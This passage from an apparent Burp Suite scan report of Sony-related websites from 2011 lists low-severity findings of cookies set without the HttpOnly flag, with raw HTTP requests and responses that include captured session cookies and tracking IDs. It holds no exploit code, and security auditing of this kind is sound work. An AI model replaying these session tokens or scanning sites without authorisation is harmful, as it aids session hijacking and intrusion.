HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/
Cache-control: private

<center><font color=red><b>ERROR:</b> Invalid Document Provided</font></center>

6.6. http://www.docs.sony.com/startchat.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.docs.sony.com
Path:	/startchat.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQSTSQSCR=FGCCABKBIDKABCNODCECHCGC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /startchat.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6969
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=FGCCABKBIDKABCNODCECHCGC; path=/
Cache-control: private

<HTML>
   <HEAD>
       <TITLE>Sony eSupport Live Chat Support</TITLE>
       <SCRIPT language="javascript">
       function openTrademarkLink(){window.open('http://products.sel.sony.com/SEL/legal/notice.html','
...[SNIP]...

6.7. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.8. http://www.sonycreativesoftware.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sonycreativesoftware.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQQDADTAB=GGCJBNHBDLCBILOMJEKPBHEP; path=/
theme=country=EN&currency=USD&name=DEFAULT&keycode=&lang=ENU; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sonycreativesoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 36816
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: theme=country=EN&currency=USD&name=DEFAULT&keycode=&lang=ENU; path=/
Set-Cookie: ASPSESSIONIDQQDADTAB=GGCJBNHBDLCBILOMJEKPBHEP; path=/
Date: Thu, 23 Jun 2011 15:19:55 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
   <head>
   <meta http-equiv="content-language" content="en-us"/>
   <title>
...[SNIP]...

6.9. http://sales.liveperson.net/hc/71737897/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71737897/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71737897/?&site=71737897&cmd=mTagUrl&lpCallId=447454077424-753562085563&protV=20&lpjson=1&SV%21impression-query-name=chat-sonystyle-sales-general-english&SV%21impression-query-room=chat-sonystyle-sales-general-english&id=4900462531&info=button-impression%3Achat-sonystyle-sales-general-english%28Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics%29&waitForVisitor=true&d=1308841110550&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:58:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 14:58:31 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"447454077424-753562085563","lpCallConfirm":"","lpData":[{"result":80}]}});

6.10. http://sony.tcliveus.com/i previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sony.tcliveus.com
Path:	/i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Tpo`=445b326b7863;expires=Thu, 23-Jun-11 19:16:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?siteID=501&ts=1308842184775&location=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551%26XID%3DM%3Asidenav%3Aesupport%26%26pageName%3DSony%2520Store%26g%3Dhttp%253A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%253FlangId%253D-1%2526storeId%253D10151%2526catalogId%253D10551%2526XID%253DM%253Asidenav%253Aesupport%26v0%3DM%253Asidenav%253Aesupport%26h1%3DSony%2520Store%26c3%3DStoreCatalogDisplay%26c6%3DSony%2520Store_%26c19%3DM%253Asidenav%253Aesupport%26v19%3DM%253Asidenav%253Aesupport%26v22%3DM%253Asidenav%253Aesupport%26v23%3DUnited%2520States%2520English%26c27%3DSony%2520Store%2520-%2520Control%26v27%3DSony%2520Store%2520-%2520Control%26v42%3DOther%26v43%3DOther%26v44%3DOther&tagv=5.3&tz=-300&r=empty&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%C2%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics&cd=32&ah=1156&aw=1920&sh=1200&sw=1920&pd=32 HTTP/1.1
Host: sony.tcliveus.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=0007b036-7b3b-8256-99e6-bc8d00000050; NSC_Tpo`=445b326b7863

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Connection: Keep-Alive
Content-Length: 43
Last-Modified: Thu, 23 Jun 2011 15:16:26 GMT
Content-Type: image/gif
Date: Thu, 23 Jun 2011 15:16:26 GMT
Set-Cookie: NSC_Tpo`=445b326b7863;expires=Thu, 23-Jun-11 19:16:25 GMT;path=/

GIF89a.............!.......,............Q.;

6.11. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sonyelectronicssupportus.112.2o7.net
Path:	/b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597E[CE]; Expires=Tue, 21 Jun 2016 15:19:26 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.12. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sonyelectronicssupportus.112.2o7.net
Path:	/b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.13. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sonysscom.112.2o7.net
Path:	/b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.14. http://twitter.com/sonyoutletusa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sonyoutletusa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.15. http://us.playstation.com/psn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.playstation.com
Path:	/psn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SONYCOOKIE1=2741283008.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psn/ HTTP/1.1
Host: us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.16. http://www.facebook.com/sonyelectronics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sonyelectronics

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=rLE1G; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.17. http://www.flickr.com/groups/sonycameraclub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.18. http://www.flickr.com/groups/sonycameraclub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.19. http://www.omnitechsupport.com/sony/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/sony/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

model=VGNNR180E; expires=Sat, 23-Jul-2011 14:59:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sony/index.php?queue=ComputerPFS&OWChat=1&VARSET_MODELNUM=VGNNR180E HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.docs.sony.com/startchat.asp?modelnum=VGNNR180E&chat=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

6.20. http://www.sony.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sony.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache
Last-Modified: Thu, 23 Jun 2011 11:47:08 GMT
ETag: "16c6fb-1d30-a50c6700"
Accept-Ranges: bytes
Content-Length: 7472
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

<html>
<head>
<title>Sony USA</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="pragma" content="no-cache" />
<meta name="google-site-verification" conte
...[SNIP]...

6.21. http://www.sony.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sony.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:49 GMT
Server: Apache
Location: http://www.sony.com/index.html
Content-Length: 276
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sony.com/index.html">here</a>.</p>
<
...[SNIP]...

6.22. http://www.sony.com/storagemedia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sony.com
Path:	/storagemedia

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.tpo`.dpn-mc-80=449b232f3660;Version=1;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storagemedia HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:19:49 GMT
Server: Apache
Location: http://pro.sony.com/bbsc/ssr/cat-datastorage/cat-storagemedia/
Content-Length: 332
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b232f3660;Version=1;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://pro.sony.com/bbs
...[SNIP]...

6.23. http://www.sonystyle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS5bbf46=20e81bc3747692973bc65cdb0fe7a96ffeed7bcabbab0ab54e0359c4; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844043|PC#1308841090453-474854.17#1310051783|check#true#1308842243; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedM%3Asidenav%3AesupportM%3Asidenav%3Aesupportundefined; s_channel=%5B%5B%27Other%27%2C%271308842183820%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; TS5bbf46=f5a8dd8fbe1377be8633e5a97c94fd613db8de389f7769144e0359c4

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:36 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=20e81bc3747692973bc65cdb0fe7a96ffeed7bcabbab0ab54e0359c4; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

6.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_PERSISTENT=xRu1VrtkgP52lzARnuVxGqRnJ6o%3d%0a%3b2011%2d06%2d23+11%3a19%3a58%2e856%5f1308841107995%2d82466%5f10151%5f241903395%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:58 GMT; Path=/
WC_USERACTIVITY_241903395=241903395%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG71reM2szqU9sVaoSplcv4qC13K3MxVyVffFlubAypUsqxwsrdjgGwciI7t%2bmUJpOpQ%0awCZ7N%2bxU8GRW1M9qkUX1QRYnKOeclHhUzZiuZ4Ag7kJUtfEcbEI83mX7QHMCV3dEPblR56Avsg%3d%3d; Path=/
TS5bbf46=629bbaf3a13ad4191c8387200e85cb355e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e31c595fb302859d4; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92869
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=xRu1VrtkgP52lzARnuVxGqRnJ6o%3d%0a%3b2011%2d06%2d23+11%3a19%3a58%2e856%5f1308841107995%2d82466%5f10151%5f241903395%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:58 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903395=241903395%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG71reM2szqU9sVaoSplcv4qC13K3MxVyVffFlubAypUsqxwsrdjgGwciI7t%2bmUJpOpQ%0awCZ7N%2bxU8GRW1M9qkUX1QRYnKOeclHhUzZiuZ4Ag7kJUtfEcbEI83mX7QHMCV3dEPblR56Avsg%3d%3d; Path=/
Set-Cookie: TS5bbf46=629bbaf3a13ad4191c8387200e85cb355e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e31c595fb302859d4; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 92869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>

<script type="t
...[SNIP]...

6.25. http://www.sonystyle.com/webapp/wcs/stores/servlet/ReturnProductInfo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/ReturnProductInfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS5bbf46=bf993e9f934dbd72f3971d5cefc73a642c2d2c068de0310e4e0359c7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/ReturnProductInfo?URL=SYReturnProductInfoResponseView&storeId=10151&syncPrice=true&getProdInfo=true HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; TS5bbf46=a2f5f4c32c2bdfdeb5abca8520ca28c3722f09a76db9ae634e0359c4; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; 